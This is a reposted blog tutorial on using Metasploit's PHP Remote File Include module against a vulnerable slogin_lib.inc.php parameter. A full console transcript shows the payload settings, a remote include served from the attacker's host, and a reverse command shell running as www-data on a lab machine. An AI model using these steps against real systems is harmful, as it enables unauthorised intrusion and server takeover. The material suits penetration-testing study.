博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Using the Metasploit PHP Remote File Include Module
阅读量:2434 次
发布时间:2019-05-10

本文共 3148 字,大约阅读时间需要 10 分钟。

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
let's see it in action
msf > search php_include [*] Searching loaded modules for pattern 'php_include'... Exploits ======== Name Rank Description ---- ---- ----------- unix/webapp/php_include excellent PHP Remote File Include Generic Exploit msf > use exploit/unix/webapp/php_include msf exploit(php_include) > info Name: PHP Remote File Include Generic Exploit Version: 8762 Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: hdm egypt Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes The base directory to prepend to the URL to try PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI no The URI to request, with the include parameter changed to XXpathXX Proxies no Use a proxy chain RHOST yes The target address RPORT 80 yes The target port SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload information: Space: 32768 Description: This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX msf exploit(php_include) > set PATH /1/ PATH => /1/ msf exploit(php_include) > set RHOST 192.168.6.68 RHOST => 192.168.6.68 msf exploit(php_include) > set RPORT 8899 RPORT => 8899 msf exploit(php_include) > set PAYLOAD php/reverse_php PAYLOAD => php/reverse_php msf exploit(php_include) > set LHOST 192.168.6.140 LHOST => 192.168.6.140 msf exploit(php_include) > exploit [*] Started bind handler [*] Using URL: http://192.168.6.140:8080/RvSIqhdft [*] PHP include server started. [*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30 %38%30%2f%52%76%53%49%71%68%64%66%74%3f [*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010 dir 0.jpeg  header.inc.php license.txt slog_users.txt  version.txt 1.jpeg  index.asp old  slogin.inc.php adminlog.php install.txt readme.txt slogin_genpass.php footer.inc.php launch.asp slog_users.php slogin_lib.inc.php id uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

转载地址:http://raqmb.baihongyu.com/

你可能感兴趣的文章
利用binlog2sql实现闪回
查看>>
mongos分片集群下db数量过多导致服务不可用
查看>>
mysql唯一索引的一个小常识--Duplicate entry 'XXX' for key 'XXX'
查看>>
故障处理--mongos count不准
查看>>
大量短连接导致haproxy服务器端口耗尽
查看>>
mongo3.0.9库命名的一个S级bug
查看>>
跨版本导入数据导致mysqld崩溃
查看>>
xtrabackup对于flush tables with read lock操作的设置
查看>>
Gone away故障原因排查
查看>>
Server has authorization schema version 3,but found a schema version 1 user
查看>>
WebSphere的池设置——线程池、连接池
查看>>
caffe-ssd调试问题总结
查看>>
用户态调测工具(二):perror和man
查看>>
机器学习&深度学习入门历程
查看>>
LTP(Linux Test Project)学习(一)——LTP介绍
查看>>
LTP(Linux Test Project)学习(二)——LTP下载编译执行
查看>>
LTP(Linux Test Project)学习(三)——LTP目录介绍
查看>>
DirtyCow CVE-2016-5195分析
查看>>
caffe编译报错解决记录
查看>>
LTP(Linux Test Project)学习(七)——LTP提交补丁
查看>>